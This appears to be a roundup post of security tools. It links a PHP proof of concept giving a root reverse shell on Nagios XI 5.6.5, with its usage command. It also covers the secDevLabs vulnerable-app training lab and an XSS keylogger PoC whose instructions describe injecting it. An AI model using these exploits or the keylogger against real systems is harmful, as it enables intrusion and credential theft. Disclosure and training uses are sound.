nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
secDevLabs:-- A #laboratory for learning #secure #web #development in a #practical manner.
By provisioning local #environments via docker-compose, you will learn how the most #critical web #application #security risks are #exploited and how this #vulnerable code can be fixed to mitigate them.
After forking this repository, you will find multiple intentionally vulnerable apps based on real-life scenarios in various languages such as #Golang, #Python and #PHP. A good start would be installing the ones you are most familiar with. You can find instructions to do this on each of the apps.
#Download #Link:-
https://github.com/globocom/secDevLabs
XSS-Keylogger PoC:-- A general #Javascript #keylogger to be used in an #XSS #PoC
This is a simple PoC JavaScript keylogger to attach to an XSS vulnerability disclosure. It is made up of two #PHP servers, one acts like the #victim and the other acts as the attacker's #remote #server.
In a disclosure, you would just need to copy the code between the script tags in the victim's index.php file, remove all comments, minify and inject as you see fit (obviously making some adjustments to the target and remote variables).
How to Run:-
1. Turn on each of the servers separately using the shell scripts.
2. Open two #browser tabs, and navigate to each of these addresses:
Victim: http://127.0.0.1:8080
Attacker: http://127.0.0.1:8081
3. Then from the login page on the victim server, enter the following username and password:
Username: admin
Password: c0mpl1c@t3dp4ss
4. Once the form is submitted and you are welcomed by the home.php file, open the attacker page.
5. Refresh the attacker page to see the #keystrokes and form data entered into the keystrokes field.
#Download #Link:-
https://github.com/jakemscott/XSS-Keylogger
What is the PHP language? #PHP
What is the PHP programming language?
PHP is one of the most popular #programming_languages used for #building_websites. It is one of the languages whose code the #web_server interprets and executes, then sends the result to be displayed in the user's browser.
To read the #first lesson in PHP, use the following link:
https://www.nusurtech.ca/2024/03/php-overview.html